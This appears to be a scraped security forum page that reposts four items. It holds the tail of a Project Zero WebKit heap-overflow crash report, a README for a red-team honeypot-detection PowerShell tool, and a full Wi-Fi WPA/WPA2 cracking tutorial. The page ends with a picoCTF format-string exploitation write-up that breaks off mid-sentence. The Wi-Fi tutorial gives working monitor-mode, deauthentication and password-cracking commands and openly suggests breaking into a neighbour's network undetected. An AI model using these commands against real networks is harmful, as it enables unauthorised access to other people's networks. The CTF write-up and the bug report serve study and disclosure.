(/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) #49 0x7fff8b52be23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23) #50 0x7fff8bca785d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d) #51 0x7fff8b5207aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa) #52 0x7fff8b4eb1dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd) #53 0x7fffa33eb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) #54 0x7fffa33ea2e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) #55 0x10a28156c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) #56 0x7fffa3192234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) 0x61200006a660 is located 24 bytes to the right of 264-byte region [0x61200006a540,0x61200006a648) allocated by thread T0 here: #0 0x10d26dd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) #1 0x7fffa3314281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) #2 0x120401ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4) #3 0x1203f6c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d) #4 0x12038c437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437) #5 0x12038b768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768) #6 0x11400c548 in WebCore::RenderObject::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a548) #7 0x116bd7dbd in WebCore::RenderPtr<WebCore::RenderTextControlSingleLine> WebCore::createRenderer<WebCore::RenderTextControlSingleLine, WebCore::HTMLInputElement&, WebCore::RenderStyle>(WebCore::HTMLInputElement&&&, WebCore::RenderStyle&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dd5dbd) #8 0x116bd7d30 in WebCore::TextFieldInputType::createInputRenderer(WebCore::RenderStyle&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dd5d30) #9 0x114b57c46 in WebCore::HTMLInputElement::createElementRenderer(WebCore::RenderStyle&&, WebCore::RenderTreePosition const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd55c46) #10 0x1165cd605 in WebCore::RenderTreeUpdater::createRenderer(WebCore::Element&, WebCore::RenderStyle&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cb605) #11 0x1165cc2f7 in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca2f7) #12 0x1165cbc4d in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9c4d) #13 0x1165cb47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b) #14 0x1145707e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9) #15 0x11458f478 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d478) #16 0x114b035c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0) #17 0x11462e093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093) #18 0x1145ed386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386) #19 0x11407c997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997) #20 0x1140762aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa) #21 0x1169fdc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41) #22 0x10ad232eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb) #23 0x10ad26689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689) #24 0x10ad25ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9) #25 0x10a5c6683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683) #26 0x10a3703b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5) #27 0x10a379888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888) #28 0x1203b0312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312) #29 0x1203b0d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41) SUMMARY: AddressSanitizer: heap-buffer-overflow (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2694d46) in WTF::VectorBufferBase<WebCore::RecentSearch>::buffer() Shadow bytes around the buggy address: 0x1c240000d470: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x1c240000d480: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x1c240000d490: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa 0x1c240000d4a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x1c240000d4b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x1c240000d4c0: 00 00 00 00 00 00 00 00 00 fa fa fa[fa]fa fa fa 0x1c240000d4d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x1c240000d4e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1c240000d4f0: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa 0x1c240000d500: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x1c240000d510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==805==ABORTING This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Sursa: https://bugs.chromium.org/p/project-zero/issues/detail?id=1250
-
- 1
-
-
Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host. CodeExecution Execute code on a target machine using Import-Module. Invoke-HoneypotBuster HoneypotBuster is a tool designed to spot Honey Tokens, Honey Bread Crumbs, and Honey Pots used by common Distributed Deception vendors. This tool will help spot the following deception techniques: 1. Kerberoasting Service Accounts Honey Tokens Just like the one described in the ADSecurity article by Sean Metcalf, this tricks attackers to scan for Domain Users with assigned SPN (Service Principal Name) and {adminCount = 1} LDAP Attribute flag. So when you try to request TGS for that user, you’ll be exposed as Kerberoasting attempt. TGS definition: A ticket granting server (TGS) is a logical key distribution center (KDC) component that is used by the Kerberos protocol as a trusted third party. 2. Fake Computer Accounts Honey Pots Creating many domain computer objects with no actual devices associated to them will result in confusion to any attacker trying to study the network. Any attempt to perform lateral movement into these fake objects will lead to exposure of the attacker. 3. Fake Credentials Manager Credentials Breadcrumbs Many deception vendors are injecting fake credentials into the “Credentials Manager”. These credentials will also be revealed using tools such as Mimikatz. Although they aren’t real, attackers might confuse them as authentic credentials and use them. 4. Fake Domain Admins Accounts Honey Tokens Creating several domain admins and their credentials who have never been active is bad policy. These Honey Tokens lure attackers to try brute-forcing domain admin credentials. Once someone tries to authenticate to this user, an alarm will be triggered, and the attacker will be revealed. Microsoft ATA uses this method. 5. Fake Mapped Drives Breadcrumbs Many malicious automated scripts and worms are spreading via SMB Shares, especially if they’re mapped as Network Drive Share. This tool will try to correlate some of the data collected before to identify any mapped drive related to a specific Honey Pot server. 6. DNS Records Manipulation HoneyPots One of the methods deception vendors use to detect fake endpoints is registering their DNS records towards the Honey Pot Server. They will then be able to point the attacker directly to their honey pot instead of actual endpoints. License The Honeypot buster project and all individual scripts are under the [BSD 3-Clause license] unless explicitly noted otherwise. Usage To install any of these modules, drop the powershell scripts into a directory and type Import-Module PathTo\scriptName.ps1 Then run the Module from the Powershell. Refer to the comment-based help in each individual script for detailed usage information. Sursa: https://github.com/JavelinNetworks/HoneypotBuster
-
- 2
-
-
Wi-Fi Cracking Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat. This is a brief walk-through tutorial that illustrates how to crack Wi-Fi networks that are secured using weak passwords. It is not exhaustive, but it should be enough information for you to test your own network's security or break into one nearby. The attack outlined below is entirely passive (listening only, nothing is broadcast from your computer) and it is impossible to detect provided that you don't actually use the password that you crack. An optional active deauthentication attack can be used to speed up the reconnaissance process and is described at the end of this document. If you are familiar with this process, you can skip the descriptions and jump to a list of the commands used at the bottom. DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use. Don't be a dick. Getting Started This tutorial assumes that you: Have a general comfortability using the command-line Are running a debian-based linux distro (preferably Kali linux) Have Aircrack-ng installed sudo apt-get install aircrack-ng Have a wireless card that supports monitor mode (I recommend this one. See here for more info.) Cracking a Wi-Fi Network Monitor Mode Begin by listing wireless interfaces that support monitor mode with: airmon-ng If you do not see an interface listed then your wireless card does not support monitor mode ? We will assume your wireless interface name is wlan0 but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode: airmon-ng start wlan0 Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon). Find Your Target Start listening to 802.11 Beacon frames broadcast by nearby wireless routers using your monitor interface: airodump-ng mon0 You should see output similar to what is below. CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests 14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8 14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0> 14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro 9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme 00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin's Awesome 06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2 78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2 9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca For the purposes of this demo, we will choose to crack the password of my network, "hackme". Remember the BSSID MAC address and channel (CH) number as displayed by airodump-ng, as we will need them both for the next step. Capture a 4-way Handshake WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don't have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airmon-ng to monitor traffic on the target network using the channel and bssid values discovered from the previous command. # replace -c and --bssid values with the values of your target network # -w specifies the directory where we will save the packet capture airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0 CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS Now we wait... Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time. If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this. Once you've captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack: mv ./-01.cap hackme.cap Crack the Network Password The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like https://gpuhash.me/ or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng. Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files. Cracking With naive-hashcat (recommended) Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly. cap2hccapx.bin hackme.cap hackme.hccapx Next, download and run naive-hashcat: # download git clone https://github.com/brannondorsey/naive-hashcat cd naive-hashcat # download the 134MB rockyou dictionary file curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt # crack ! baby ! crack ! # 2500 is the hashcat hash mode for WPA/WPA2 HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE: e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet Where the last two fields seperated by : are the network name and password respectively. If you would like to use hashcat without naive-hashcat see this page for info. Cracking With Aircrack-ng Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file: # download the 134MB rockyou dictionary file curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt Note, that if the network password is not in the wordfile you will not crack the password. # -a2 specifies WPA2, -b is the BSSID, -w is the wordfile aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password. Aircrack-ng 1.2 beta3 [00:01:49] 111040 keys tested (1017.96 k/s) KEY FOUND! [ hacktheplanet ] Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21 EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4 Deauth Attack A deauth attack sends forged deauthentication packets from your machine to a client connected to the network you are trying to crack. These packets include fake "sender" addresses that make them appear to the client as if they were sent from the access point themselves. Upon receipt of such packets, most clients disconnect from the network and immediately reconnect, providing you with a 4-way handshake if you are listening with airodump-ng. Use airodump-ng to monitor a specific access point (using -c channel --bssid MAC) until you see a client (STATION) connected. A connected client look something like this, where is 64:BC:0C:48:97:F7 the client MAC. CH 6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS BSSID STATION PWR Rate Lost Frames Probe 9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 ASUS Now, leave airodump-ng running and open a new terminal. We will use the aireplay-ng command to send fake death packets to our victim client, forcing it to reconnect to the network and hopefully grabbing a handshake in the process. # -0 10 specifies we would like to send 10 deauth packets # -a is the MAC of the access point # -c is the MAC of the client aireplay-ng -0 10 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0 Once you've sent the deauth packets, head back over to your airodump-ng process, and with any luck you should now see something like this at the top right: [ WPA handshake: 9C:5C:8E:C9:AB:C0. Now that you've captured a handshake you should be ready to crack the network password. List of Commands Below is a list of all of the commands needed to crack a WPA/WPA2 network, in order, with minimal explanation. # put your network device into monitor mode airmon-ng start wlan0 # listen for all nearby beacon frames to get target BSSID and channel airodump-ng mon0 # start listening for the handshake airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0 # optionally deauth a connected client to force a handshake aireplay-ng -0 10 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0 ########## crack password with aircrack-ng... ########## # download 134MB rockyou.txt dictionary file if needed curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt # crack w/ aircrack-ng aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap ########## or crack password with naive-hashcat ########## # convert cap to hccapx cap2hccapx.bin capture/-01.cap capture/-01.hccapx # crack with naive-hashcat HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh Attribution Much of the information presented here was gleaned from Lewis Encarnacion's awesome tutorial. Thanks also to the awesome authors and maintainers who work on Aircrack-ng and Hashcat. Shout out to DrinkMoreCodeMore, hivie7510, hartzell, flennic, bhusang, and Shark0der who also provided suggestions and typo fixes on Reddit and GitHub. If you are interested in hearing some great proposed alternatives to WPA2, check out some of the great discussion on this Hacker News post. Sursa: https://github.com/brannondorsey/wifi-cracking
-
- 1
-
-
picoCTF Write-up ~ Bypassing ASLR via Format String Bug _py Apr 23 10 Hello folks! I hope you're all doing great. After a disgusting amount of trial and error, I present to you my solution for the console pwnable. Unfortunately, I did not solve the task on time but it was fun nevertheless. I decided to use this challenge as a way to introduce to you one of the ways you can bypass ASLR. If you have never messed with basic pwning i.e stack/buffer overflows, this write-up might not be your cup of tea. It'll be quite technical. Firstly I'll bombard you with theory and then we will move to the actual PoC/exploit, aka the all-time classic @_py way of explaining stuff. Let's dive right into, shall we? Code Auditing Though the source code was provided (you can find a link to at the bottom of the write-up), you could easily spot the bug just by reading the disassembly. Since some of you might not be experienced with Reverse Engineering, below are the important parts of code: [...] void set_exit_message(char *message) { if (!message) { printf("No message chosen\n"); exit(1); } printf("Exit message set!\n"); printf(message); append_command('e', message); exit(0); } void set_prompt(char *prompt) { if (!prompt) { printf("No prompt chosen\n"); exit(1); } if (strlen(prompt) > 10) { printf("Prompt too long\n"); exit(1); } printf("Login prompt set to: %10s\n", prompt); append_command('p', prompt); exit(0); } [...] void loop() { char buf[1024]; while (true) { printf("Config action: "); char *result = fgets(buf, 1024, stdin); if (!result) exit(1); char *type = strtok(result, " "); if (type == NULL) { continue; } char *arg = strtok(NULL, "\n"); switch (type[0]) { case 'l': set_login_message(arg); break; case 'e': set_exit_message(arg); break; case 'p': set_prompt(arg); break; default: printf("Command unrecognized.\n"); /* Fallthrough */ case 'h': print_help(); break; } } } [...] Here is the bug: void set_exit_message(char *message) { [...] printf("Exit message set!\n"); printf(message); append_command('e', message); exit(0); } Cute, we've got control over printf! For those who do not understand why this is a bug, let me give you a brief rundown. To be honest, there are a bunch of resources on how format string attacks work, but since I'm making the effort to explain the exploit, it'd feel incomplete not to explain the theory behind it. I hope you know the basics of the stack at least, otherwise the following will not make much sense. Printf & Stack Analysis +------------+ | | | ... | | 8th arg | +------------+ | 7th arg | +------------+ | ret addr | +------------+ | ... | | local vars | | ... | +------------+ Now you might be asking yourselves, "what's up with the 7th and 8th argument in the ascii art?". Well, we are dealing with a 64-bit ELF binary. Meaning, as far as the function calling convention is concerned, the ABI states the following(simplified): The first 6 integer or pointer arguments to a function are passed in registers. The first is placed in rdi, the second in rsi, the third in rdx, and then rcx, r8 and r9. Only the 7th argument and onwards are passed on the stack. Interesting. Let's enter the h4x0r mode and brainstorm a little bit. By typing man 3 printf we get the following intel: #include <stdio.h> int printf(const char *format, ...); So printf receives "2" arguments: The string format i.e "%d %x %s". A variable number of arguments. Ok that sounds cool and all, but how can we exploit this? The key in exploit development and in hacking overall, is being able to see through the abstraction. Let me explain myself further. Let's assume we have the following code: [...] 1. int32_t num = 6; 2. printf("%d", num); [...] Here's the pseudo-assembly for it: 1. mov [rbp - offset], 0x6 2. mov rsi, [rbp - offset] 3. mov rdi, "%d" 4. call printf Our format specifier includes "%d". What this whispers into printf's ear is "yo printf, you are about to get called with one format specifier, %d to be precise. According to the ABI, expect the argument to be in rdi, ok?" Then, printf will read the content of rdi and print the number 6 to stdout. Do you see where this is going? No? Alright, one more example. [...] 1. int32_t num = 6; 2. printf("%d %d %d %d"); [...] 1. mov [rbp - offset], 0x6 2. ??? 3. call printf In case you didn't notice, I changed the format string and the number of arguments being passed to printf. "What will this whisper into printf's ear?" you ask. Well, "yo printf, you are about to get called with 4 format specifiers, 4 %d's to be precise. According to the ABI, expect the arguments to be in rdi, rsi and so on, ok?" Now what's going to happen in this case? Has anything practically changed? Ofcourse not! Printf is dumb, all it knows is the format specifier. It "trusts" us, the user/program about the content of rdi, rsi etc. As I've stated before, we had control over printf. Control over its format specifier argument to be exact. That's really powerful! Why? 179 The above clip is a demo of the vulnerable CTF task. If you read the source code real quick (shouldn't take more than 5 mins to understand what it does), you'd realize that set_exit_message essentially receives as an argument whatever we place next to 'e' (e stands for exit). Afterwards, it calls printf with that argument. So what gives? The format string we provided, instructed printf to print its 8 byte integer "arguments" as pointers (%p expects a pointer). The values printed are values that printf finds at the locations it would normally expect arguments. Because printf actually gets one real argument, namely the pointer to buf (passed in %rdi), it will expect the next 5 arguments within the remaining registers and everything else on the stack. That's the case with our binary as well! We managed to leak memory! And the best part? We actually read values "above" set_exit_message's stack frame! Take a good look at the printf output. Does 0x400aa6 ring a bell? Looks like a text segment address. That's the return address in set_exit_message's stack frame, aka a loop's instruction address! Moreover, did you notice the 0x7025207025207025 value? Since the architecture is little-endian, converting the hex values to characters, we get the following: 0x25 -> '%' 0x70 -> 'p' 0x20 -> ' ' Holy moly! We leaked main's stack frame! But more importantly, our own input! That's the so called read primitive, which basically means we get to read whatever value we want, either in registers, stack or even our own input. You'll see how crucial that is in the exploitation segment. Do you understand now what I mean by seeing through the abstraction? We managed to exploit a simple assumption that computer scientists took for granted. Phew, alrigthy, I hope I made sense folks. Let's slowly move on to the exploitation part. First of all, this is a pwnable task, which means we need to get a shell (root privs) in order to be able to read the flag text file. Hmm, how can we tackle the task knowing that we have a read primitive? Let's construct a plan: We managed to read values off of registers and the stack, aka read primitive. We can take advantage of that and read certain values that will be useful to us, such as libc's base address. If we manage to leak libc's address, we can calculate addresses of other "pwnable" functions such as execve or system, and get a shell. Note, I say "leak", because ASLR is activated. Thus, in every execution the libc will have a different base address. Otherwise, if ASLR was off, its address would be hardcoded and our life would be much easier. Libc's functions are a constant offset away from libc's base address so we won't have an issue leaking them once we get the base address. Alright, we can leak libc's functions, and then what? Let's pause our plan for a while. (Note: Though dynamic linking is not a prerequisite to understand the high level view of the exploit, knowing its internals will give you a much better insight of the nitty-gritty details of the exploitation process. I have made quite a detailed write-up on Dynamic Linking internals which can be found here). The Dark Side Of Printf We saw that we have an arbitrary read through the format string bug. But that's not enough. Wouldn't be awesome if we could somehow not only read values but also write? Enter the dark zone folks: %n specifier If you are not into pwning or programming in C you have probably never seen the "%n" specifier. %n is the gold mine for format string attacks. Using this stackoverflow link8 as a reference, I'll explain what %n is capable of. #include <stdio.h> int main() { int val; printf("blah %n blah\n", &val); printf("val = %d\n", val); return 0; } Output: blah blah val = 5 Simply put, it stores the amount of characters printed on the screen to a variable (providing its address). Sweet, now we have a write primitive as well! How can we take advantage of that? Since we have an arbitrary write, we can write anything we want to wherever we want (you'll see how shortly). Let's resume our plan: We can overwrite any address with a value that makes our life easier. We could overwrite a function's address with system's and game over! Nope, not that easily at least. Looking at the source, we can see that after printf is called, exit() is called. This is a bummer, since our plan does not only require an arbitrary write, but an arbitrary read as well. We can't just leak libc's base address AND overwrite a function through the same format string. We need to do it in separate steps. But how? Exit() will terminate the program. Unless, we overwrite exit's address with something else! Hmm, that's indeed a pretty neat idea. But with what? What about loop's address?! That sounds like an awesome plan! We can overwrite exit's address with loop's, leading to the binary never exiting! That way, we can endlessly enter our bogus input and read/write values with no rush. %[width] modifier Another dark wizardry of printf is the following code: [...] printf("Output:"); printf("%100x", 6); [...] Terminal: > ./demo Output: 6 6 is padded to a size of 100 bytes long. In other words, with the [modifier] part we can instruct printf to print whatever amount of bytes we want. Why is that useful though? Imagine having to write the value 0x1337 to a variable using the %n specifier (keep in mind that function addresses vary from 0x400000 all the way to 0x7fe5b94126a3. That trick will be really helpful to us.). Trying to actually type 0x1337 character by hands is tedious and a waste of time. The above modifier gets the job done easier. %[number]$ specifier The last trick we'll be using is the $[number] specifier which helps us refer to certain stack offsets and what not. Demo time: 62 Scroll up to the demo where I showed you the bug in action through the %p specifier. If you count the values that are printed, you will notice that 0x400aa6 is the 9th value. By entering %9$p as I showed above, we can refer to it directly. Imagine replacing 'p', with 'n'. What would have happened? In a different case, it would crash because 0x400aa6 would be overwritten with the amount of characters being printed (which would not be a valid instruction address). In our case, nothing should happen since exit() is called, which means we will never return back to loop(). Pwning Time I know this might look like a lot to take in, but without the basics and theory, we are handicapped. Bare in mind, it took me around 3-5 days of straight research in order to get this to work. If you feel like it's complicated, it's not. You just need to re-read it a couple of times and play with the binary yourself in order to get a feel of it. Be patient, code is coming soon. It will all make sense (hopefully). Our plan starts making sense. First step is to overwrite exit's address with loop's. Luckily for us, the binary does not have full ASLR on. Meaning, the text segment which includes the machine code, and the Global Offset Table (refer to my Dynamic Linking write-up, I warned you), which includes function pointers to libc (and more), will have a hardcoded address. Now that we learnt all about the dark side of printf, it's time to apply this knowledge onto the task. Overwriting exit In order to do that, we first need to place exit's GOT entry in the format string. The reason for that is that since we have an 